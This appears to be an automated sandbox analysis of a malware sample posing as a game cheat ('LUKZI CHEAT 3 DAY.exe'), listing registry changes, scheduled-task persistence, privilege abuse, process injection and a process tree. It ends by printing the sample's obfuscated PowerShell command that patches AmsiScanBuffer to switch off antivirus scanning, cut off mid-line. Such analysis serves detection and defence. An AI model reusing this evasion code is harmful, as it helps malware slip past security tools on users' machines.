0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000b501bcd05981db01f20f69801a8edb01f20f69801a8edb01d3de08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000515a4f842000613339643634336136646533386363393663306163373163353066356230303465343062303336623033306436343630386262623930386563346333626237360000b20009000400efbe515a4f84515a4f842e000000000000000000000000000000000000000000000000008c4ea100610033003900640036003400330061003600640065003300380063006300390036006300300061006300370031006300350030006600350062003000300034006500340030006200300033003600620030003300300064003600340036003000380062006200620039003000380065006300340063003300620062003700360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000be3426831000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61333964363433613664653338636339366330616337316335306635623030346534306230333662303330643634363038626262393038656334633362623736000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000726b6d646264636f0000000000000000b66abbf5c5c9144cbbc848dae445368f072708d94cedef118cd4f6c132cc6d85b66abbf5c5c9144cbbc848dae445368f072708d94cedef118cd4f6c132cc6d85ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d00320032003500390031003800330036002d0031003100380033003000390030003000350035002d0031003200320030003600350038003100380030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000924b2722000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a = 2c0e80801a8edb01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b09fbe44-77ca-4abd-8 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a = "\\\\?\\Volume{22274B92-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a56638e5a7e685fd5e9b70b64c8028113bd98d7d0559ee1ab15bf7497a2f5369" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a = "0" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f91750c5-12eb-4630-a RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000b501bcd05981db014c885f801a8edb014c885f801a8edb01e5990a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000515a4f842000613536363338653561376536383566643565396237306236346338303238313133626439386437643035353965653161623135626637343937613266353336390000b20009000400efbe515a4f84515a4f842e0000000000000000000000000000000000000000000000000019ec9e00610035003600360033003800650035006100370065003600380035006600640035006500390062003700300062003600340063003800300032003800310031003300620064003900380064003700640030003500350039006500650031006100620031003500620066003700340039003700610032006600350033003600390000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000be3426831000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61353636333865356137653638356664356539623730623634633830323831313362643938643764303535396565316162313562663734393761326635333639000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000726b6d646264636f0000000000000000b66abbf5c5c9144cbbc848dae445368f062708d94cedef118cd4f6c132cc6d85b66abbf5c5c9144cbbc848dae445368f062708d94cedef118cd4f6c132cc6d85ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d00320032003500390031003800330036002d0031003100380033003000390030003000350035002d0031003200320030003600350038003100380030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000924b2722000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a = "\\\\?\\Volume{22274B92-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a39d643a6de38cc96c0ac71c50f5b004e40b036b030d64608bbb908ec4c3bb76" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a = "0" RuntimeBroker.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3856 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4720 powershell.exe 4720 powershell.exe 2244 powershell.exe 2244 powershell.exe 2244 powershell.exe 5036 FMyUS.eXe 5036 FMyUS.eXe 5036 FMyUS.eXe 5036 FMyUS.eXe 4312 VjTDlRoV.exe 4312 VjTDlRoV.exe 4312 VjTDlRoV.exe 4312 VjTDlRoV.exe 3032 powershell.exe 3032 powershell.exe 3032 powershell.exe 1808 powershell.exe 1808 powershell.exe 1808 powershell.exe 436 powershell.exe 436 powershell.exe 436 powershell.exe 1668 powershell.EXE 1668 powershell.EXE 1668 powershell.EXE 1668 powershell.EXE 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 396 dllhost.exe 4316 powershell.exe 4316 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3384 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4720 powershell.exe Token: SeDebugPrivilege 1876 LUKZI CHEAT 3 DAY.exe Token: SeDebugPrivilege 2244 powershell.exe Token: SeDebugPrivilege 5036 FMyUS.eXe Token: SeDebugPrivilege 4312 VjTDlRoV.exe Token: SeDebugPrivilege 3000 svOrbEl0.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 1668 powershell.EXE Token: SeDebugPrivilege 1668 powershell.EXE Token: SeDebugPrivilege 396 dllhost.exe Token: SeShutdownPrivilege 2164 mousocoreworker.exe Token: SeCreatePagefilePrivilege 2164 mousocoreworker.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeDebugPrivilege 1588 powershell.exe Token: SeDebugPrivilege 1064 powershell.exe Token: SeDebugPrivilege 4844 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2340 svchost.exe Token: SeIncreaseQuotaPrivilege 2340 svchost.exe Token: SeSecurityPrivilege 2340 svchost.exe Token: SeTakeOwnershipPrivilege 2340 svchost.exe Token: SeLoadDriverPrivilege 2340 svchost.exe Token: SeSystemtimePrivilege 2340 svchost.exe Token: SeBackupPrivilege 2340 svchost.exe Token: SeRestorePrivilege 2340 svchost.exe Token: SeShutdownPrivilege 2340 svchost.exe Token: SeSystemEnvironmentPrivilege 2340 svchost.exe Token: SeUndockPrivilege 2340 svchost.exe Token: SeManageVolumePrivilege 2340 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2340 svchost.exe Token: SeIncreaseQuotaPrivilege 2340 svchost.exe Token: SeSecurityPrivilege 2340 svchost.exe Token: SeTakeOwnershipPrivilege 2340 svchost.exe Token: SeLoadDriverPrivilege 2340 svchost.exe Token: SeSystemtimePrivilege 2340 svchost.exe Token: SeBackupPrivilege 2340 svchost.exe Token: SeRestorePrivilege 2340 svchost.exe Token: SeShutdownPrivilege 2340 svchost.exe Token: SeSystemEnvironmentPrivilege 2340 svchost.exe Token: SeUndockPrivilege 2340 svchost.exe Token: SeManageVolumePrivilege 2340 svchost.exe Token: SeAuditPrivilege 2484 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2340 svchost.exe Token: SeIncreaseQuotaPrivilege 2340 svchost.exe Token: SeSecurityPrivilege 2340 svchost.exe Token: SeTakeOwnershipPrivilege 2340 svchost.exe Token: SeLoadDriverPrivilege 2340 svchost.exe Token: SeSystemtimePrivilege 2340 svchost.exe Token: SeBackupPrivilege 2340 svchost.exe Token: SeRestorePrivilege 2340 svchost.exe Token: SeShutdownPrivilege 2340 svchost.exe Token: SeSystemEnvironmentPrivilege 2340 svchost.exe Token: SeUndockPrivilege 2340 svchost.exe Token: SeManageVolumePrivilege 2340 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2340 svchost.exe Token: SeIncreaseQuotaPrivilege 2340 svchost.exe Token: SeSecurityPrivilege 2340 svchost.exe Token: SeTakeOwnershipPrivilege 2340 svchost.exe Token: SeLoadDriverPrivilege 2340 svchost.exe Token: SeSystemtimePrivilege 2340 svchost.exe Token: SeBackupPrivilege 2340 svchost.exe Token: SeRestorePrivilege 2340 svchost.exe Token: SeShutdownPrivilege 2340 svchost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1876 LUKZI CHEAT 3 DAY.exe -
Suspicious use of UnmapMainImage 5 IoCs
pid Process 2444 svchost.exe 2444 svchost.exe 3384 Explorer.EXE 4092 RuntimeBroker.exe 1360 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3460 wrote to memory of 1364 3460 LUKZI CHEAT 3 DAY.exe 87 PID 3460 wrote to memory of 1364 3460 LUKZI CHEAT 3 DAY.exe 87 PID 3460 wrote to memory of 796 3460 LUKZI CHEAT 3 DAY.exe 88 PID 3460 wrote to memory of 796 3460 LUKZI CHEAT 3 DAY.exe 88 PID 796 wrote to memory of 4720 796 cmd.exe 90 PID 796 wrote to memory of 4720 796 cmd.exe 90 PID 1364 wrote to memory of 1876 1364 LUKZI CHEAT 3 DAY.exe 92 PID 1364 wrote to memory of 1876 1364 LUKZI CHEAT 3 DAY.exe 92 PID 4720 wrote to memory of 2244 4720 powershell.exe 94 PID 4720 wrote to memory of 2244 4720 powershell.exe 94 PID 4720 wrote to memory of 5036 4720 powershell.exe 96 PID 4720 wrote to memory of 5036 4720 powershell.exe 96 PID 4720 wrote to memory of 5036 4720 powershell.exe 96 PID 5036 wrote to memory of 4312 5036 FMyUS.eXe 97 PID 5036 wrote to memory of 4312 5036 FMyUS.eXe 97 PID 4720 wrote to memory of 3000 4720 powershell.exe 98 PID 4720 wrote to memory of 3000 4720 powershell.exe 98 PID 3000 wrote to memory of 3032 3000 svOrbEl0.exe 102 PID 3000 wrote to memory of 3032 3000 svOrbEl0.exe 102 PID 3000 wrote to memory of 1808 3000 svOrbEl0.exe 104 PID 3000 wrote to memory of 1808 3000 svOrbEl0.exe 104 PID 3000 wrote to memory of 436 3000 svOrbEl0.exe 106 PID 3000 wrote to memory of 436 3000 svOrbEl0.exe 106 PID 3000 wrote to memory of 3856 3000 svOrbEl0.exe 109 PID 3000 wrote to memory of 3856 3000 svOrbEl0.exe 109 PID 4720 wrote to memory of 1824 4720 powershell.exe 111 PID 4720 wrote to memory of 1824 4720 powershell.exe 111 PID 4720 wrote to memory of 1824 4720 powershell.exe 111 PID 1668 wrote to memory of 396 1668 powershell.EXE 116 PID 1668 wrote to memory of 396 1668 powershell.EXE 116 PID 1668 wrote to memory of 396 1668 powershell.EXE 116 PID 1668 wrote to memory of 396 1668 powershell.EXE 116 PID 1668 wrote to memory of 396 1668 powershell.EXE 116 PID 1668 wrote to memory of 396 1668 powershell.EXE 116 PID 1668 wrote to memory of 396 1668 powershell.EXE 116 PID 1668 wrote to memory of 396 1668 powershell.EXE 116 PID 396 wrote to memory of 612 396 dllhost.exe 5 PID 396 wrote to memory of 672 396 dllhost.exe 7 PID 396 wrote to memory of 948 396 dllhost.exe 12 PID 396 wrote to memory of 60 396 dllhost.exe 13 PID 396 wrote to memory of 464 396 dllhost.exe 14 PID 396 wrote to memory of 712 396 dllhost.exe 15 PID 396 wrote to memory of 652 396 dllhost.exe 16 PID 396 wrote to memory of 1108 396 dllhost.exe 18 PID 396 wrote to memory of 1116 396 dllhost.exe 19 PID 396 wrote to memory of 1196 396 dllhost.exe 20 PID 396 wrote to memory of 1248 396 dllhost.exe 21 PID 396 wrote to memory of 1288 396 dllhost.exe 22 PID 396 wrote to memory of 1296 396 dllhost.exe 23 PID 396 wrote to memory of 1392 396 dllhost.exe 24 PID 396 wrote to memory of 1440 396 dllhost.exe 25 PID 396 wrote to memory of 1464 396 dllhost.exe 26 PID 396 wrote to memory of 1552 396 dllhost.exe 27 PID 396 wrote to memory of 1580 396 dllhost.exe 28 PID 396 wrote to memory of 1652 396 dllhost.exe 29 PID 396 wrote to memory of 1708 396 dllhost.exe 30 PID 396 wrote to memory of 1716 396 dllhost.exe 31 PID 396 wrote to memory of 1812 396 dllhost.exe 32 PID 396 wrote to memory of 1912 396 dllhost.exe 33 PID 396 wrote to memory of 1920 396 dllhost.exe 34 PID 396 wrote to memory of 1972 396 dllhost.exe 35 PID 396 wrote to memory of 1992 396 dllhost.exe 36 PID 396 wrote to memory of 1500 396 dllhost.exe 37 PID 396 wrote to memory of 2060 396 dllhost.exe 39 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:60
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ebf1837c-5f83-496a-90ea-69f4a4dc5e21}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:396
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:464
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:652 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AODHWWCMiRqI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PSpXHWRKqdzjpL,[Parameter(Position=1)][Type]$tDqgZAgEhO)$wUKWPFmiDoy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fl'+'e'+''+'c'+''+'t'+'e'+[Char](100)+''+'D'+'el'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'M'+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+'od'+'u'+''+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+'e'+'legat'+'e'+'T'+[Char](121)+'p'+'e'+'',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,'+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'S'+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'oCl'+[Char](97)+''+'s'+'s',[MulticastDelegate]);$wUKWPFmiDoy.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+'pe'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+'l'+''+'i'+'c',[Reflection.CallingConventions]::Standard,$PSpXHWRKqdzjpL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$wUKWPFmiDoy.DefineMethod('In'+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+'H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+'o'+'t'+[Char](44)+''+[Char](86)+'irt'+'u'+''+[Char](97)+'l',$tDqgZAgEhO,$PSpXHWRKqdzjpL).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $wUKWPFmiDoy.CreateType();}$LfiyjKRGjKZDs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType('M'+'i'+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+'t'+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+'n'+'sa'+[Char](102)+''+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+[Char](118)+'e'+[Char](77)+''+[Char](101)+'t'+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$VmUbPmHkHEEQdY=$LfiyjKRGjKZDs.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+'A'+''+[Char](100)+''+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'S'+'t'+'a'+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$sNhGrOrLpYQQFuIECcH=AODHWWCMiRqI @([String])([IntPtr]);$DqqSKhJOZGpYQegeUGeHII=AODHWWCMiRqI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ThlaUNJgAFi=$LfiyjKRGjKZDs.GetMethod('G'+[Char](101)+'t'+[Char](77)+''+'o'+''+'d'+''+'u'+''+'l'+''+[Char](101)+''+'H'+''+[Char](97)+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+''+'l'+''+'3'+'2'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')));$CqonZCBxpbymUw=$VmUbPmHkHEEQdY.Invoke($Null,@([Object]$ThlaUNJgAFi,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+'ib'+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$oHSTgMwgBqOOXPCKH=$VmUbPmHkHEEQdY.Invoke($Null,@([Object]$ThlaUNJgAFi,[Object]('Vi'+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+''+'P'+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+'t')));$VCYYGpY=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CqonZCBxpbymUw,$sNhGrOrLpYQQFuIECcH).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i.'+[Char](100)+''+[Char](108)+''+'l'+'');$xVlecdJOcRstiSSqG=$VmUbPmHkHEEQdY.Invoke($Null,@([Object]$VCYYGpY,[Object](''+'A'+''+'m'+''+[Char](115)+''+'i'+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'uf'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$lJDVinZgJB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oHSTgMwgBqOOXPCKH,$DqqSKhJOZGpYQegeUGeHII).Invoke($xVlecdJOcRstiSSqG,[uint32]8,4,[ref]$lJD